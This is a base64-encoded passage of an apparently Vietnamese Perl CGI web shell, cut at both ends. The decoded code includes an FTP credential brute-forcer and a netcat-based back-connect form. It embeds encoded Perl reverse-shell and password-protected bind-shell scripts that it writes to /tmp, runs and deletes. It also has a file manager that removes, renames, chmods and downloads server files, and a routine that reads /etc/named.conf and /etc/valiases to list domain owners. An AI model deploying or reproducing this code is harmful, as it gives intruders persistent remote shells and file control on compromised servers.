JGZ0cC0+bG9naW4oIiR1c2VybmFtZSIsIiRwYXNzd29yZCIpKQoJCQkJCXsKCQkJCQkJJHJlc3VsdCAuPSAiPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9J2Z0cDovLyR1c2VybmFtZTokcGFzc3dvcmRcQCRTZXJ2ZXInPlsrXSBmdHA6Ly8kdXNlcm5hbWU6JHBhc3N3b3JkXEAkU2VydmVyPC9hPjxicj5cbiI7CgkJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCQkJYnJlYWs7CgkJCQkJfQoJCQkJCWlmKCEoJGlueydzbGVlcCd9IGVxICIwIikpCgkJCQkJewoJCQkJCQlzbGVlcChpbnQoJGlueydzbGVlcCd9KSk7CgkJCQkJfQoJCQkJCSRmdHAtPnF1aXQoKTsKCQkJCX0KCQkJfQoJCX0KCQkkcmVzdWx0IC49ICJcbjxicj49PT09PT09PT09Pj4+Pj4+Pj4+PiBGaW5pc2hlZCA8PDw8PDw8PDw8PT09PT09PT09PTxicj5cbiI7Cgl9CglyZXR1cm4gJHJlc3VsdDsKfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgQmFja2Nvbm5lY3QgRm9ybQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZEZvcm0KewoJcmV0dXJuIDw8RU5EOwoJPGJyPjxicj4KCgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CYWNrQ29ubmVjdDogPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImJhY2tiaW5kIj48L3RkPgoJPHRkPiBIb3N0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMjAiIG5hbWU9ImNsaWVudGFkZHIiIHZhbHVlPSIkRU5WeydSRU1PVEVfQUREUid9Ij4KCSBQb3J0OiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iNyIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjgwIiBvbmtleXVwPSJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnYmEnKS5pbm5lckhUTUw9dGhpcy52YWx1ZTsiPjwvdGQ+CgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkNvbm5lY3QiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDbGllbnQgbGlzdGVuIGJlZm9yZSBjb25uZWN0IGJhY2shCgk8YnI+WytdIFRyeSBjaGVjayB5b3VyIFBvcnQgd2l0aCA8YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0iaHR0cDovL3d3dy5jYW55b3VzZWVtZS5vcmcvIj5odHRwOi8vd3d3LmNhbnlvdXNlZW1lLm9yZy88L2E+Cgk8YnI+WytdIENsaWVudCBsaXN0ZW4gd2l0aCBjb21tYW5kOiA8cnVuPm5jIC12diAtbCAtcCA8c3BhbiBpZD0iYmEiPjgwPC9zcGFuPjwvcnVuPjwvZm9udD48L3RkPgoKCTwvdHI+Cgk8L3RhYmxlPgoKCTxicj48YnI+Cgk8dGFibGU+Cgk8dHI+Cgk8Zm9ybSBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KCTx0ZD5CaW5kIFBvcnQ6IDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJiYWNrYmluZCI+PC90ZD4KCgk8dGQ+IFBvcnQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBzaXplPSIxNSIgbmFtZT0iY2xpZW50cG9ydCIgdmFsdWU9IjE0MTIiIG9ua2V5dXA9ImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdiaScpLmlubmVySFRNTD10aGlzLnZhbHVlOyI+CgoJIFBhc3N3b3JkOiA8aW5wdXQgdHlwZT0idGV4dCIgc2l6ZT0iMTUiIG5hbWU9ImJpbmRwYXNzIiB2YWx1ZT0iVEhJRVVHSUFCVU9OIj48L3RkPgoJPHRkPjxpbnB1dCBuYW1lPSJzIiBjbGFzcz0ic3VibWl0IiB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkJpbmQiPjwvdGQ+Cgk8L2Zvcm0+Cgk8L3RyPgoJPHRyPgoJPHRkIGNvbHNwYW49Mz48Zm9udCBjb2xvcj0jRkZGRkZGPlsrXSBDaHVjIG5hbmcgY2h1YSBkYyB0ZXN0IQoJPGJyPlsrXSBUcnkgY29tbWFuZDogPHJ1bj5uYyAkRU5WeydTRVJWRVJfQUREUid9IDxzcGFuIGlkPSJiaSI+MTQxMjwvc3Bhbj48L3J1bj48L2ZvbnQ+PC90ZD4KCgk8L3RyPgoJPC90YWJsZT48YnI+CkVORAp9CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBCYWNrY29ubmVjdCB1c2UgcGVybAojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBCYWNrQmluZAp7Cgl1c2UgTUlNRTo6QmFzZTY0OwoJdXNlIFNvY2tldDsJCgkkYmFja3Blcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdTVTg2T2xOdlkydGxkRHNOQ2lSVGFHVnNiQWs5SUNJdlltbHVMMkpoYzJnaU93MEtKRUZTUjBNOVFFRlNSMVk3RFFwMWMyVWdVMjlqYTJWME93MEtkWE5sSUVacGJHVklZVzVrYkdVN0RRcHpiMk5yWlhRb1UwOURTMFZVTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2daMlYwY0hKdmRHOWllVzVoYldVb0luUmpjQ0lwS1NCdmNpQmthV1VnY0hKcGJuUWdJbHN0WFNCVmJtRmliR1VnZEc4Z1VtVnpiMngyWlNCSWIzTjBYRzRpT3cwS1kyOXVibVZqZENoVFQwTkxSVlFzSUhOdlkydGhaR1J5WDJsdUtDUkJVa2RXV3pGZExDQnBibVYwWDJGMGIyNG9KRUZTUjFaYk1GMHBLU2tnYjNJZ1pHbGxJSEJ5YVc1MElDSmJMVjBnVlc1aFlteGxJSFJ2SUVOdmJtNWxZM1FnU0c5emRGeHVJanNOQ25CeWFXNTBJQ0pEYjI1dVpXTjBaV1FoSWpzTkNsTlBRMHRGVkMwK1lYVjBiMlpzZFhOb0tDazdEUXB2Y0dWdUtGTlVSRWxPTENBaVBpWlRUME5MUlZRaUtUc05DbTl3Wlc0b1UxUkVUMVZVTENJK0psTlBRMHRGVkNJcE93MEtiM0JsYmloVFZFUkZVbElzSWo0bVUwOURTMFZVSWlrN0RRcHdjbWx1ZENBaUxTMDlQU0JEYjI1dVpXTjBaV1FnUW1GamEyUnZiM0lnUFQwdExTQWdYRzVjYmlJN0RRcHplWE4wWlcwb0luVnVjMlYwSUVoSlUxUkdTVXhGT3lCMWJuTmxkQ0JUUVZaRlNFbFRWQ0E3WldOb2J5QW5XeXRkSUZONWMzUmxiV2x1Wm04NklDYzdJSFZ1WVcxbElDMWhPMlZqYUc4N1pXTm9ieUFuV3l0ZElGVnpaWEpwYm1adk9pQW5PeUJwWkR0bFkyaHZPMlZqYUc4Z0oxc3JYU0JFYVhKbFkzUnZjbms2SUNjN0lIQjNaRHRsWTJodk95QmxZMmh2SUNkYksxMGdVMmhsYkd3NklDYzdKRk5vWld4c0lpazdEUXBqYkc5elpTQlRUME5MUlZRNyI7CgkkYmluZHBlcmw9Ikl5RXZkWE55TDJKcGJpOXdaWEpzRFFwMWMyVWdVMjlqYTJWME93MEtKRUZTUjBNOVFFRlNSMVk3RFFva2NHOXlkQWs5SUNSQlVrZFdXekJkT3cwS0pIQnliM1J2Q1QwZ1oyVjBjSEp2ZEc5aWVXNWhiV1VvSjNSamNDY3BPdzBLSkZOb1pXeHNDVDBnSWk5aWFXNHZZbUZ6YUNJN0RRcHpiMk5yWlhRb1UwVlNWa1ZTTENCUVJsOUpUa1ZVTENCVFQwTkxYMU5VVWtWQlRTd2dKSEJ5YjNSdktXOXlJR1JwWlNBaWMyOWphMlYwT2lRaElqc05Dbk5sZEhOdlkydHZjSFFvVTBWU1ZrVlNMQ0JUVDB4ZlUwOURTMFZVTENCVFQxOVNSVlZUUlVGRVJGSXNJSEJoWTJzb0ltd2lMQ0F4S1NsdmNpQmthV1VnSW5ObGRITnZZMnR2Y0hRNklDUWhJanNOQ21KcGJtUW9VMFZTVmtWU0xDQnpiMk5yWVdSa2NsOXBiaWdrY0c5eWRDd2dTVTVCUkVSU1gwRk9XU2twYjNJZ1pHbGxJQ0ppYVc1a09pQWtJU0k3RFFwc2FYTjBaVzRvVTBWU1ZrVlNMQ0JUVDAxQldFTlBUazRwQ1FsdmNpQmthV1VnSW14cGMzUmxiam9nSkNFaU93MEtabTl5S0RzZ0pIQmhaR1J5SUQwZ1lXTmpaWEIwS0VOTVNVVk9WQ3dnVTBWU1ZrVlNLVHNnWTJ4dmMyVWdRMHhKUlU1VUtRMEtldzBLQ1c5d1pXNG9VMVJFU1U0c0lDSStKa05NU1VWT1ZDSXBPdzBLQ1c5d1pXNG9VMVJFVDFWVUxDQWlQaVpEVEVsRlRsUWlLVHNOQ2dsdmNHVnVLRk5VUkVWU1Vpd2dJajRtUTB4SlJVNVVJaWs3RFFvSmMzbHpkR1Z0S0NKMWJuTmxkQ0JJU1ZOVVJrbE1SVHNnZFc1elpYUWdVMEZXUlVoSlUxUWdPMlZqYUc4Z0oxc3JYU0JUZVhOMFpXMXBibVp2T2lBbk95QjFibUZ0WlNBdFlUdGxZMmh2TzJWamFHOGdKMXNyWFNCVmMyVnlhVzVtYnpvZ0p6c2dhV1E3WldOb2J6dGxZMmh2SUNkYksxMGdSR2x5WldOMGIzSjVPaUFuT3lCd2QyUTdaV05vYnpzZ1pXTm9ieUFuV3l0ZElGTm9aV3hzT2lBbk95UlRhR1ZzYkNJcE93MEtDV05zYjNObEtGTlVSRWxPS1RzTkNnbGpiRzl6WlNoVFZFUlBWVlFwT3cwS0NXTnNiM05sS0ZOVVJFVlNVaWs3RFFwOURRbz0iOwoKCSRDbGllbnRBZGRyID0gJGlueydjbGllbnRhZGRyJ307CgkkQ2xpZW50UG9ydCA9IGludCgkaW57J2NsaWVudHBvcnQnfSk7CglpZigkQ2xpZW50UG9ydCBlcSAwKQoJewoJCXJldHVybiAmQmFja0JpbmRGb3JtOwoJfWVsc2lmKCEkQ2xpZW50QWRkciBlcSAiIikKCXsKCQkkRGF0YT1kZWNvZGVfYmFzZTY0KCRiYWNrcGVybCk7CgkJaWYoLXcgIi90bXAvIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JhY2tjb25uZWN0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiYWNrY29ubmVjdC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmFja2Nvbm5lY3QucGwgJENsaWVudEFkZHIgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX1lbHNlCgl7CgkJJERhdGE9ZGVjb2RlX2Jhc2U2NCgkYmluZHBlcmwpOwoJCWlmKC13ICIvdG1wIikKCQl7CgkJCSRGaWxlPSIvdG1wL2JpbmRwb3J0LnBsIjsJCgkJfWVsc2UKCQl7CgkJCSRGaWxlPSRDdXJyZW50RGlyLiRQYXRoU2VwLiJiaW5kcG9ydC5wbCI7CgkJfQoJCW9wZW4oRklMRSwgIj4kRmlsZSIpOwoJCXByaW50IEZJTEUgJERhdGE7CgkJY2xvc2UgRklMRTsKCQlzeXN0ZW0oInBlcmwgYmluZHBvcnQucGwgJENsaWVudFBvcnQiKTsKCQl1bmxpbmsoJEZpbGUpOwoJCWV4aXQgMDsKCX0KfQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgIEFycmF5IExpc3QgRGlyZWN0b3J5CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFJtRGlyKCQpIAp7CglteSAkZGlyID0gc2hpZnQ7CiAgICBpZihvcGVuZGlyKERJUiwkZGlyKSkKCXsKCQl3aGlsZSgkZmlsZSA9IHJlYWRkaXIoRElSKSkKCQl7CgkJCWlmKCgkZmlsZSBuZSAiLiIpICYmICgkZmlsZSBuZSAiLi4iKSkKCQkJewoJCQkJJGZpbGU9ICRkaXIuJFBhdGhTZXAuJGZpbGU7CgkJCQlpZigtZCAkZmlsZSkKCQkJCXsKCQkJCQkmUm1EaXIoJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXVubGluaygkZmlsZSk7CgkJCQl9CgkJCX0KCQl9CgkJY2xvc2VkaXIoRElSKTsKCX0KCWlmKCFybWRpcigkZGlyKSkKCXsKCQkKCX0KfQpzdWIgRmlsZU93bmVyKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJHVpZCwkZ2lkKSA9IChzdGF0KCRmaWxlKSlbNCw1XTsKCQlpZigkV2luTlQpCgkJewoJCQlyZXR1cm4gIj8/PyI7CgkJfQoJCWVsc2UKCQl7CgkJCSRuYW1lPWdldHB3dWlkKCR1aWQpOwoJCQkkZ3JvdXA9Z2V0Z3JnaWQoJGdpZCk7CgkJCXJldHVybiAkbmFtZS4iLyIuJGdyb3VwOwoJCX0KCX0KCXJldHVybiAiPz8/IjsKfQpzdWIgUGFyZW50Rm9sZGVyKCQpCnsKCW15ICRwYXRoID0gc2hpZnQ7CglteSAkQ29tbSA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkIC4uIi4kQ21kU2VwLiRDbWRQd2Q7CgljaG9wKCRwYXRoID0gYCRDb21tYCk7CglyZXR1cm4gJHBhdGg7Cn0Kc3ViIEZpbGVQZXJtcygkKQp7CglteSAkZmlsZSA9IHNoaWZ0OwoJbXkgJHVyID0gIi0iOwoJbXkgJHV3ID0gIi0iOwoJaWYoLWUgJGZpbGUpCgl7CgkJaWYoJFdpbk5UKQoJCXsKCQkJaWYoLXIgJGZpbGUpeyAkdXIgPSAiciI7IH0KCQkJaWYoLXcgJGZpbGUpeyAkdXcgPSAidyI7IH0KCQkJcmV0dXJuICR1ciAuICIgLyAiIC4gJHV3OwoJCX1lbHNlCgkJewoJCQkkbW9kZT0oc3RhdCgkZmlsZSkpWzJdOwoJCQkkcmVzdWx0ID0gc3ByaW50ZigiJTA0byIsICRtb2RlICYgMDc3NzcpOwoJCQlyZXR1cm4gJHJlc3VsdDsKCQl9Cgl9CglyZXR1cm4gIjAwMDAiOwp9CnN1YiBGaWxlTGFzdE1vZGlmaWVkKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZSAkZmlsZSkKCXsKCQkoJGxhKSA9IChzdGF0KCRmaWxlKSlbOV07CgkJKCRkLCRtLCR5LCRoLCRpKSA9IChsb2NhbHRpbWUoJGxhKSlbMyw0LDUsMiwxXTsKCQkkeSA9ICR5ICsgMTkwMDsKCQlAbW9udGggPSBxdy8xIDIgMyA0IDUgNiA3IDggOSAxMCAxMSAxMi87CgkJJGxtdGltZSA9IHNwcmludGYoIiUwMmQvJXMvJTRkICUwMmQ6JTAyZCIsJGQsJG1vbnRoWyRtXSwkeSwkaCwkaSk7CgkJcmV0dXJuICRsbXRpbWU7Cgl9CglyZXR1cm4gIj8/PyI7Cn0Kc3ViIEZpbGVTaXplKCQpCnsKCW15ICRmaWxlID0gc2hpZnQ7CglpZigtZiAkZmlsZSkKCXsKCQlyZXR1cm4gLXMgJGZpbGU7Cgl9CglyZXR1cm4gIjAiOwoKfQpzdWIgUGFyc2VGaWxlU2l6ZSgkKQp7CglteSAkc2l6ZSA9IHNoaWZ0OwoJaWYoJHNpemUgPD0gMTAyNCkKCXsKCQlyZXR1cm4gJHNpemUuICIgQiI7Cgl9CgllbHNlCgl7CgkJaWYoJHNpemUgPD0gMTAyNCoxMDI0KSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4wMmYiLCRzaXplIC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIEtCIjsKCQl9CgkJZWxzZSAKCQl7CgkJCSRzaXplID0gc3ByaW50ZigiJS4yZiIsJHNpemUgLyAxMDI0IC8gMTAyNCk7CgkJCXJldHVybiAkc2l6ZS4iIE1CIjsKCQl9Cgl9Cn0Kc3ViIHRyaW0oJCkKewoJbXkgJHN0cmluZyA9IHNoaWZ0OwoJJHN0cmluZyA9fiBzL15ccysvLzsKCSRzdHJpbmcgPX4gcy9ccyskLy87CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgQWRkU2xhc2hlcygkKQp7CglteSAkc3RyaW5nID0gc2hpZnQ7Cgkkc3RyaW5nPX4gcy9cXC9cXFxcL2c7CglyZXR1cm4gJHN0cmluZzsKfQpzdWIgTGlzdERpcgp7CglteSAkcGF0aCA9ICRDdXJyZW50RGlyLiRQYXRoU2VwOwoJJHBhdGg9fiBzL1xcXFwvXFwvZzsKCW15ICRyZXN1bHQgPSAiPGZvcm0gbmFtZT0nZicgYWN0aW9uPSckU2NyaXB0TG9jYXRpb24nPjxzcGFuIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+UGF0aDogWyAiLiZBZGRMaW5rRGlyKCJndWkiKS4iIF0gPC9zcGFuPjxpbnB1dCB0eXBlPSd0ZXh0JyBuYW1lPSdkJyBzaXplPSc0MCcgdmFsdWU9JyRDdXJyZW50RGlyJyAvPjxpbnB1dCB0eXBlPSdoaWRkZW4nIG5hbWU9J2EnIHZhbHVlPSdndWknPjxpbnB1dCBjbGFzcz0nc3VibWl0JyB0eXBlPSdzdWJtaXQnIHZhbHVlPSdDaGFuZ2UnPjwvZm9ybT4iOwoJaWYoLWQgJHBhdGgpCgl7CgkJbXkgQGZuYW1lID0gKCk7CgkJbXkgQGRuYW1lID0gKCk7CgkJaWYob3BlbmRpcihESVIsJHBhdGgpKQoJCXsKCQkJd2hpbGUoJGZpbGUgPSByZWFkZGlyKERJUikpCgkJCXsKCQkJCSRmPSRwYXRoLiRmaWxlOwoJCQkJaWYoLWQgJGYpCgkJCQl7CgkJCQkJcHVzaChAZG5hbWUsJGZpbGUpOwoJCQkJfQoJCQkJZWxzZQoJCQkJewoJCQkJCXB1c2goQGZuYW1lLCRmaWxlKTsKCQkJCX0KCQkJfQoJCQljbG9zZWRpcihESVIpOwoJCX0KCQlAZm5hbWUgPSBzb3J0IHsgbGMoJGEpIGNtcCBsYygkYikgfSBAZm5hbWU7CgkJQGRuYW1lID0gc29ydCB7IGxjKCRhKSBjbXAgbGMoJGIpIH0gQGRuYW1lOwoJCSRyZXN1bHQgLj0gIjxkaXY+PHRhYmxlIHdpZHRoPSc5MCUnIGNsYXNzPSdsaXN0ZGlyJz4KCgkJPHRyIHN0eWxlPSdiYWNrZ3JvdW5kLWNvbG9yOiAjM2UzZTNlJz48dGg+RmlsZSBOYW1lPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjEwMHB4Oyc+RmlsZSBTaXplPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+T3duZXI8L3RoPgoJCTx0aCBzdHlsZT0nd2lkdGg6MTAwcHg7Jz5QZXJtaXNzaW9uPC90aD4KCQk8dGggc3R5bGU9J3dpZHRoOjE1MHB4Oyc+TGFzdCBNb2RpZmllZDwvdGg+CgkJPHRoIHN0eWxlPSd3aWR0aDoyNjBweDsnPkFjdGlvbjwvdGg+PC90cj4iOwoJCW15ICRzdHlsZT0ibGluZSI7CgkJbXkgJGk9MDsKCQlmb3JlYWNoIG15ICRkIChAZG5hbWUpCgkJewoJCQkkc3R5bGU9ICgkc3R5bGUgZXEgImxpbmUiKSA/ICJub3RsaW5lIjogImxpbmUiOwoJCQkkZCA9ICZ0cmltKCRkKTsKCQkJJGRpcm5hbWU9JGQ7CgkJCWlmKCRkIGVxICIuLiIpIAoJCQl7CgkJCQkkZCA9ICZQYXJlbnRGb2xkZXIoJHBhdGgpOwoJCQl9CgkJCWVsc2lmKCRkIGVxICIuIikgCgkJCXsKCQkJCSRkID0gJHBhdGg7CgkJCX0KCQkJZWxzZSAKCQkJewoJCQkJJGQgPSAkcGF0aC4kZDsKCQkJfQoJCQkkcmVzdWx0IC49ICI8dHIgY2xhc3M9JyRzdHlsZSc+CgoJCQk8dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7IGZvbnQtd2VpZ2h0OiBib2xkOyc+PGEgIGhyZWY9Jz9hPWd1aSZkPSIuJGQuIic+WyAiLiRkaXJuYW1lLiIgXTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZD5ESVI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7Jz4iLiZGaWxlT3duZXIoJGQpLiI8L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjx0ZCBpZD0nRmlsZVBlcm1zXyRpJyBzdHlsZT0ndGV4dC1hbGlnbjpjZW50ZXI7JyBvbmRibGNsaWNrPVwicm1fY2htb2RfZm9ybSh0aGlzLCIuJGkuIiwnIi4mRmlsZVBlcm1zKCRkKS4iJywnIi4kZGlybmFtZS4iJylcIiA+PHNwYW4gb25jbGljaz1cImNobW9kX2Zvcm0oIi4kaS4iLCciLiRkaXJuYW1lLiInKVwiID4iLiZGaWxlUGVybXMoJGQpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZCkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZGlybmFtZScsJyIuJkFkZFNsYXNoZXMoJkFkZFNsYXNoZXMoJGQpKS4iJylcIj5SZW5hbWU8L2E+ICB8IDxhIG9uY2xpY2s9XCJpZighY29uZmlybSgnUmVtb3ZlIGRpcjogJGRpcm5hbWUgPycpKSB7IHJldHVybiBmYWxzZTt9XCIgaHJlZj0nP2E9Z3VpJmQ9JHBhdGgmcmVtb3ZlPSRkaXJuYW1lJz5SZW1vdmU8L2E+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8L3RyPiI7CgkJCSRpKys7CgkJfQoJCWZvcmVhY2ggbXkgJGYgKEBmbmFtZSkKCQl7CgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlPSRmOwoJCQkkZiA9ICRwYXRoLiRmOwoJCQkkdmlldyA9ICI/ZGlyPSIuJHBhdGguIiZ2aWV3PSIuJGY7CgkJCSRyZXN1bHQgLj0gIjx0ciBjbGFzcz0nJHN0eWxlJz48dGQgaWQ9J0ZpbGVfJGknIHN0eWxlPSdmb250OiAxMXB0IFZlcmRhbmE7Jz48YSBocmVmPSc/YT1jb21tYW5kJmQ9Ii4kcGF0aC4iJmM9ZWRpdCUyMCIuJGZpbGUuIic+Ii4kZmlsZS4iPC9hPjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkPiIuJlBhcnNlRmlsZVNpemUoJkZpbGVTaXplKCRmKSkuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPiIuJkZpbGVPd25lcigkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIGlkPSdGaWxlUGVybXNfJGknIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnIG9uZGJsY2xpY2s9XCJybV9jaG1vZF9mb3JtKHRoaXMsIi4kaS4iLCciLiZGaWxlUGVybXMoJGYpLiInLCciLiRmaWxlLiInKVwiID48c3BhbiBvbmNsaWNrPVwiY2htb2RfZm9ybSgkaSwnJGZpbGUnKVwiID4iLiZGaWxlUGVybXMoJGYpLiI8L3NwYW4+PC90ZD4iOwoJCQkkcmVzdWx0IC49ICI8dGQgc3R5bGU9J3RleHQtYWxpZ246Y2VudGVyOyc+Ii4mRmlsZUxhc3RNb2RpZmllZCgkZikuIjwvdGQ+IjsKCQkJJHJlc3VsdCAuPSAiPHRkIHN0eWxlPSd0ZXh0LWFsaWduOmNlbnRlcjsnPjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0iLiRwYXRoLiImYz1lZGl0JTIwIi4kZmlsZS4iJz5FZGl0PC9hPiB8IDxhIGhyZWY9J2phdmFzY3JpcHQ6cmV0dXJuIGZhbHNlOycgb25jbGljaz1cInJlbmFtZV9mb3JtKCRpLCckZmlsZScsJ2YnKVwiPlJlbmFtZTwvYT4gfCA8YSBocmVmPSc/YT1kb3dubG9hZCZvPWdvJmY9Ii4kZi4iJz5Eb3dubG9hZDwvYT4gfCA8YSBvbmNsaWNrPVwiaWYoIWNvbmZpcm0oJ1JlbW92ZSBmaWxlOiAkZmlsZSA/JykpIHsgcmV0dXJuIGZhbHNlO31cIiBocmVmPSc/YT1ndWkmZD0kcGF0aCZyZW1vdmU9JGZpbGUnPlJlbW92ZTwvYT48L3RkPiI7CgkJCSRyZXN1bHQgLj0gIjwvdHI+IjsKCQkJJGkrKzsKCQl9CgkJJHJlc3VsdCAuPSAiPC90YWJsZT48L2Rpdj4iOwoJfQoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRyeSB0byBWaWV3IExpc3QgVXNlcgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBWaWV3RG9tYWluVXNlcgp7CglvcGVuIChkb21haW5zLCAnL2V0Yy9uYW1lZC5jb25mJykgb3IgJGVycj0xOwoJbXkgQGNuenMgPSA8ZG9tYWlucz47CgljbG9zZSBkMG1haW5zOwoJbXkgJHN0eWxlPSJsaW5lIjsKCW15ICRyZXN1bHQ9IjxoNT48Zm9udCBzdHlsZT0nZm9udDogMTVwdCBWZXJkYW5hO2NvbG9yOiAjZmY5OTAwOyc+SG9hbmcgU2EgLSBUcnVvbmcgU2E8L2ZvbnQ+PC9oNT4iOwoJaWYgKCRlcnIpCgl7CgkJJHJlc3VsdCAuPSAgKCc8cD5DMHVsZG5cJ3QgQnlwYXNzIGl0ICwgU29ycnk8L3A+Jyk7CgkJcmV0dXJuICRyZXN1bHQ7Cgl9ZWxzZQoJewoJCSRyZXN1bHQgLj0gJzx0YWJsZT48dHI+PHRoPkRvbWFpbnM8L3RoPiA8dGg+VXNlcjwvdGg+PC90cj4nOwoJfQoJZm9yZWFjaCBteSAkb25lIChAY256cykKCXsKCQlpZigkb25lID1+IG0vLio/em9uZSAiKC4qPykiIHsvKQoJCXsJCgkJCSRzdHlsZT0gKCRzdHlsZSBlcSAibGluZSIpID8gIm5vdGxpbmUiOiAibGluZSI7CgkJCSRmaWxlbmFtZT0gIi9ldGMvdmFsaWFzZXMvIi4kb25lOwoJCQkkb3duZXIgPSBnZXRwd3VpZCgoc3RhdCgkZmlsZW5hbWUpKVs0XSk7CgkJCSRyZXN1bHQgLj0gJzx0ciBjbGFzcz0iJHN0eWxlIiB3aWR0aD01MCU+PHRkPicuJG9uZS4nIDwvdGQ+PHRkPiAnLiRvd25lci4nPC90ZD48L3RyPic7CgkJfQoJfQoJJHJlc3VsdCAuPSAnPC90YWJsZT4nOwoJcmV0dXJuICRyZXN1bHQ7Cn0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFZpZXcgTG9nCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS